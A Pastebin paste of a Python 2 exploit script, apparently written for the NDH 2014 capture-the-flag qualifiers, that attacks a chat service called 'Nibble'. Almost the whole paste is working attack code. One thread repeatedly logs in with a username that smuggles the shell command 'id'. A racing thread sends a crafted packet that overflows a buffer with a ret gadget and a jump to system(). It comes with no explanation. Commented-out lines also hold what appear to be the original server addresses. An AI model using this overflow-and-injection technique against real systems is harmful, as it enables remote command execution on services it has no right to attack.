SHARE
TWEET

#ndh2k14 #ndhquals Nibble sploit

a guest Apr 7th, 2014 241 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python2
  2. # -*- coding: utf-8 -*-
  3. # quals NDH 2014
  4. # Nibble Sploit
  5. # pollypocket - y0ug
  6.  
  7. import time
  8. import curses
  9. import socket
  10. import chat_protocol_pb2
  11. from curses.textpad import rectangle
  12. from struct import pack
  13. import threading
  14. import signal
  15. import sys
  16. import threading
  17. import struct
  18.  
  19.  
  20. class NetWrapper:
  21.     def __init__(self):
  22.         pass
  23.  
  24.     def connect(self):
  25.         try:
  26.             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  27.             s.settimeout(60);
  28.             #46.231.151.147
  29.             #s.connect(("54.217.202.218", 4567))
  30.             s.connect(("127.0.0.1", 4567))
  31.             self.socket = s
  32.             return True
  33.         except:
  34.             return False
  35.  
  36.     def auth(self,username):
  37.         authpacket = chat_protocol_pb2.AuthPacket()
  38.         authpacket.username = username
  39.         self.username = username
  40.         data = "1" + authpacket.SerializeToString()
  41.         self.socket.send(pack('<I', len(data)) + data)
  42.  
  43.     def wait_authresponse(self):
  44.         authresponse = chat_protocol_pb2.TokenResponse()
  45.         authresponse.ParseFromString(self.socket.recv(1024))
  46.         if authresponse.authstatus == 1:
  47.             self.token = authresponse.token
  48.             return True
  49.         else:
  50.             return False
  51.  
  52.     def sendmessage(self,token, username, msg):
  53.         if len(msg) < 2:
  54.             return
  55.         usermessage = chat_protocol_pb2.ChatMessage()
  56.         usermessage.cookie = token
  57.         usermessage.nickname = username
  58.         usermessage.textmessage = msg
  59.         data = "2" + usermessage.SerializeToString()
  60.         self.socket.send(pack('<I', len(data)) + data)
  61.  
  62.  
  63. event = threading.Event()
  64.  
  65. def classic_user():
  66.     n1 = NetWrapper()
  67.     while n1.connect():
  68.         event.set()
  69.         n1.auth("USER1;id")
  70.         event.clear()
  71.         n1.socket.close()
  72.         time.sleep(2)
  73.  
  74. def trigger_user():
  75.     n1 = NetWrapper()
  76.     while n1.connect():
  77.         payload = "Z" * 125
  78.         payload += struct.pack('<I', 0x8049d4d) # ret;
  79.         payload += struct.pack('<I', 0x08048BD0) # jmp system
  80.         l = len(payload)
  81.         if l < 0x80:
  82.             header = "\x31\x0a%c" % (chr(l))
  83.         elif l < 0x100:
  84.             header = "\x31\x0a%c\x01" % (chr(l))
  85.         else:
  86.             return
  87.  
  88.         pwn = struct.pack('<I', len(header+payload))
  89.         pwn += header
  90.         pwn += payload
  91.  
  92.         event.wait()
  93.         n1.socket.send(pwn)
  94.         n1.socket.close()
  95.         time.sleep(1)
  96.  
  97. if __name__ == "__main__":
  98.     thread = threading.Thread(target = classic_user)
  99.     thread2 = threading.Thread(target = trigger_user)
  100.     thread.start()
  101.     thread2.start()
  102.     thread2.join()
RAW Paste Data
Top